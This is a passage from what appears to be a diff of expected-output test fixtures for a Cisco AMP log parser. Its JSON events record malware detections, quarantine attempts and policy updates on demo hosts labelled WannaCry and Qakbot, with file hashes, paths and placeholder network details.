], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:09.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.24D004A104-95.SBX.TG", + "cisco.amp.detection_id": "6419303565650558978", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 426000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + 
"event.dataset": "cisco.amp", + "event.id": 6419303565650559000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "file.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\WINDOWS\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 62075, + "process.hash.md5": "4e568dbe3fff1a0025eb432dc929b78f", + "process.hash.sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf", + "process.hash.sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71", + "process.name": "lsass.exe", + "process.pid": 768, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "db349b97c37d22f5ea1d1841e3c89eb4", + "e889544aff85ffaf8b0d0da705105dee7c97fe26" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:09.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.24D004A104-95.SBX.TG", + "cisco.amp.detection_id": "6419303565650558977", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + 
"cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 399000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303565650559000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "file.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\Windows\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 63680, + "process.hash.md5": "4e568dbe3fff1a0025eb432dc929b78f", + "process.hash.sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf", + "process.hash.sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71", + "process.name": "lsass.exe", + "process.pid": 768, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "db349b97c37d22f5ea1d1841e3c89eb4", + "e889544aff85ffaf8b0d0da705105dee7c97fe26" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:10:32.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + 
"cisco.amp.event_type_id": 553648130, + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 199000000, + "event.action": "Policy Update", + "event.dataset": "cisco.amp", + "event.id": 6412662859016176000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 65285, + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:10:31.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 553648130, + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 856000000, + "event.action": "Policy Update", + "event.dataset": "cisco.amp", + "event.id": 6412662854721208000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 66208, + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:10:30.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + 
"mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6412662850426241035", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 233000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412662850426241000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 67131, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:10:30.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6412662850426241034", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 218000000, + "event.action": 
"Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412662850426241000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 68332, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:10:30.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6412662850426241033", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 218000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412662850426241000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 69533, + "related.hash": [ + 
"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:10:30.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.D177E09A9A-95.SBX.TG", + "cisco.amp.detection_id": "6412662850426241035", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 218000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412662850426241000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "file.name": "el2j9fcqj.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\el2j9fcqj.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 70734, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:10:30.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": 
"test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.D177E09A9A-95.SBX.TG", + "cisco.amp.detection_id": "6412662850426241034", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 218000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412662850426241000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "file.name": "kepv86368.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\kepv86368.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 71990, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:10:30.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.D177E09A9A-95.SBX.TG", + "cisco.amp.detection_id": "6412662850426241033", + "cisco.amp.event_type_id": 553648147, + 
"cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 218000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412662850426241000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "file.name": "uqlq0o884.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\uqlq0o884.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 73246, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T18:03:55.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419281601187807332", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 891000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 
6419281601187807000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 74502, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T18:03:55.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.24D004A104-95.SBX.TG", + "cisco.amp.detection_id": "6419281601187807332", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 891000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419281601187807000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\WINDOWS\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", 
+ "input.type": "log", + "log.offset": 75695, + "process.hash.md5": "4e568dbe3fff1a0025eb432dc929b78f", + "process.hash.sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf", + "process.hash.sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71", + "process.name": "lsass.exe", + "process.pid": 708, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T18:03:52.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419281588302905443", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 396000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419281588302905000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "file.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\Windows\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": 
"Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 77209, + "process.hash.md5": "4e568dbe3fff1a0025eb432dc929b78f", + "process.hash.sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf", + "process.hash.sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71", + "process.name": "lsass.exe", + "process.pid": 708, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "db349b97c37d22f5ea1d1841e3c89eb4", + "e889544aff85ffaf8b0d0da705105dee7c97fe26" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T18:03:52.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419281588302905443", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 927000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419281588302905000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 78808, + 
"related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:51:19.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411538569722068995", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 495000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411538569722069000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 79928, + "related.hash": [ + "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:51:19.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + 
"cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411538569722068994", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 495000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411538569722069000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 81129, + "related.hash": [ + "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:51:19.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411538569722068993", + "cisco.amp.event_type_id": 553648155, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 495000000, + "event.action": "Retrospective Quarantine", + 
"event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411538569722069000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 82330, + "related.hash": [ + "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:51:19.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "Auto.BAC7BC5281.in10.tht.Talos", + "cisco.amp.detection_id": "6411538569722068995", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 495000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411538569722069000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "file.name": "igvj$vN.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\Documents\\igvj$vN.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "host.os.family": 